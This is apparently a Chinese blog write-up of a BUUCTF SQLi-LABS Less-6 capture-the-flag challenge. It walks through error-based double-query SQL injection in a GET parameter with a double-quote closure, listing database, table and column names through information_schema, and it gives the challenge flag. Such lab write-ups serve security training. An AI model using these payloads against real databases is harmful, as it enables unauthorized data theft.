首页 > 数据库 >【CTF Web】BUUCTF SQLi-LABS Page-1(Basic Challenges) Less-6 Writeup(SQL注入+GET请求+报错注入+双注入+双引号闭合+字符型注入)

【CTF Web】BUUCTF SQLi-LABS Page-1(Basic Challenges) Less-6 Writeup(SQL注入+GET请求+报错注入+双注入+双引号闭合+字符型注入)

时间:2024-09-22 22:55:50浏览次数:9  
标签:Web group information 报错 --+ 注入 id select schema

sqli-labs

1
点击启动靶机。

SQLi-LABS Page-1(Basic Challenges)

原理

双注入

模板:

select count(*),concat(([payload]),floor(rand(0)*2)) as a from [table_name] group by a

解法

发送 GET 请求,id 作为参数。

http://b3f804a6-9ba6-418d-ac25-bf8d48589b62.node5.buuoj.cn/Less-6/?id=1


?id=1'

没有报错。

?id=1"

发生错误。

构造闭合:

?id=1"; --+

正常输出。

判断列数:

?id=1" order by 1,2,3; --+


?id=1" order by 1,2,3,4; --+

到4时报错,有三列。

判断输出位置:

?id=-1" union select 1,2,3; --+

没有输出。

爆库名:

?id=-1" union select 1,count(*),concat((select group_concat(schema_name) from information_schema.schemata),floor(rand(0)*2)) as a from information_schema.schemata group by a; --+

没有报错。

?id=-1" union select 1,count(*),concat((select schema_name from information_schema.schemata limit 1),' - ',floor(rand(0)*2)) as a from information_schema.schemata group by a; --+

有个 ctftraining 表。

爆表名:

?id=-1" union select 1,count(*),concat((select table_name from information_schema.tables where table_schema='ctftraining'  limit 1),' - ',floor(rand(0)*2)) as a from information_schema.schemata group by a; --+

有个 flag 表。

爆列名:

?id=-1" union select 1,count(*),concat((select column_name from information_schema.columns where table_schema='ctftraining'  limit 1),' - ',floor(rand(0)*2)) as a from information_schema.schemata group by a; --+

查询 flag:

?id=-1" union select 1,count(*),concat((select flag from ctftraining.flag limit 1),' - ',floor(rand(0)*2)) as a from information_schema.schemata group by a; --+

Flag

flag{6baf6140-4646-4f31-bb61-e42b13de98a1}

参考资料

声明

本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规

博主坚决反对任何形式的非法黑客行为,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规不得用于任何非法目的。对于因使用这些技术而导致的任何后果,博主不承担任何责任

标签:Web,group,information,报错,--+,注入,id,select,schema
From: https://blog.csdn.net/qq_34988204/article/details/138653604

相关文章

  • Python可视化过程中.pictures.add这里一直报错,不明原因
    大家好,我是Python进阶者。一、前言前几天在Python白银交流群【沐子山树】问了一个Python可视化的问题,问题如下:importmatplotlib.pyplotasplt#创建一个简单的图表fig,ax=plt.subplots()ax.plot([1,2,3,4])ax.set_ylabel('somenumbers')#保存图表为PNG文件temp......
  • javaweb第一课
    初识web前端web标准Web标准也称为网页标准,由一系列的标准组成,大部分由W3C(WorldWideWebConsortium,万维网联盟)负责制定。三个组成部分:HTML:负责网页的结构(页面元素和内容)。CSS:负责网页的表现(页面元素的外观、位置等页面样式,如:颜色、大小等)。Javascript......
  • Web刷题之polarctf靶场(2)
    1.蜜雪冰城吉警店点开靶场,发现题目说点到隐藏奶茶(也就是第九杯)就给flag,但是明显就只有八杯,猜测大概率考的是前端代码修改把id=1修改为id=9,然后回到页面点击原味奶茶即可弹出flag#flag{7d43cc8863ad0ee649048e562fde53ec}2.召唤神龙打开靶场发现是一个游戏,爽......
  • [机器人仿真]WEBOTS中创建轮腿机器人模型-并联闭环机构的创建和使用
    想着做个轮腿的机器人玩玩,但是如果光用PID做算法,对于轮子加腿的结构似乎效果并不好,为了实现轮腿本身能够飞坡在一定高度下能够跳跃,我想着上个仿真模型来调试和学习LQR算法机器人仿真的软件似乎挺多,我查到比较常用的有ROS套件的一个,还有就是webots本着界面简单,开源(还有校园网方便......
  • Shiro漏洞复现-springboot运行报错的解决 && 项目本地tomcat部署
    一、Springboot项目运行出现的种种问题:首先需要下载环境代码,来源Github等开源平台,下载解压后使用IDEA打开,由于Shiro通常与Springboot项目捆绑,所以通常运行需要Springboot环境,如下图所示:运行时可能会出现如下报错:unabletostartServletWebServerApplicationcontextd......
  • 帝国cms配置PHP7.4登陆后台报错解决方法
    帝国CMS7.5在升级到PHP7.4后出现了后台登录报错的问题,可以通过以下几个步骤来解决:1.确认数据库接口类型帝国CMS7.5支持PHP7.x系列,但需要确保数据库接口类型正确配置为 mysqli。已经安装好的帝国CMS修改配置文件打开文件 /e/config/config.php。将 $ecms_confi......
  • app自动化之adb报错合集
    1、提示这个错误,很多时候说的是adb版本过旧导致的,说的更新一下abd,但是使用SDKManager安装platform-tools(内含adb)选择的是最新的版本,所以不存在adb过旧,只能是其他原因。此时得考虑一下端口被占用的原因。百度了一下最后发现是因为360手机助手占用了对应端口,将360手机助手关闭或是......
  • 用友U8CRM relobjreportlist.php SQL注入漏洞复现
    0x01漏洞描述:        用友U8CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。        用友U8CRM客户关系管理系统relobjreportlist.php 文件存在SQL注入漏洞,未经身份验证的攻击者通过漏......
  • 9.9付费进群系统 wxselect SQL注入漏洞复现
    0x01漏洞描述:2024年9.9付费进群Plus版系统是一种新的社群管理方式,用户通过支付9.9元人民币即可加入特定的微信群,享受群内提供的服务或资源。这种模式通常用于知识分享、资源下载、专业交流等社群,通过设置门槛来筛选成员,提高群组的专业性和互动质量。在位于/group/controlle......
  • 数据飞轮如何为电商平台注入新活力
    在电子商务领域,面对激烈的市场竞争和日益多样化的消费者需求,数据中台已成为连接用户与产品的关键枢纽。随着数据飞轮的理念逐渐深入人心,越来越多的企业开始探索如何通过高效的数据运用,实现商业价值的最大化。本文将探讨数据飞轮如何在电商平台中“唤醒”数据,令数据中台焕发新的活力......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99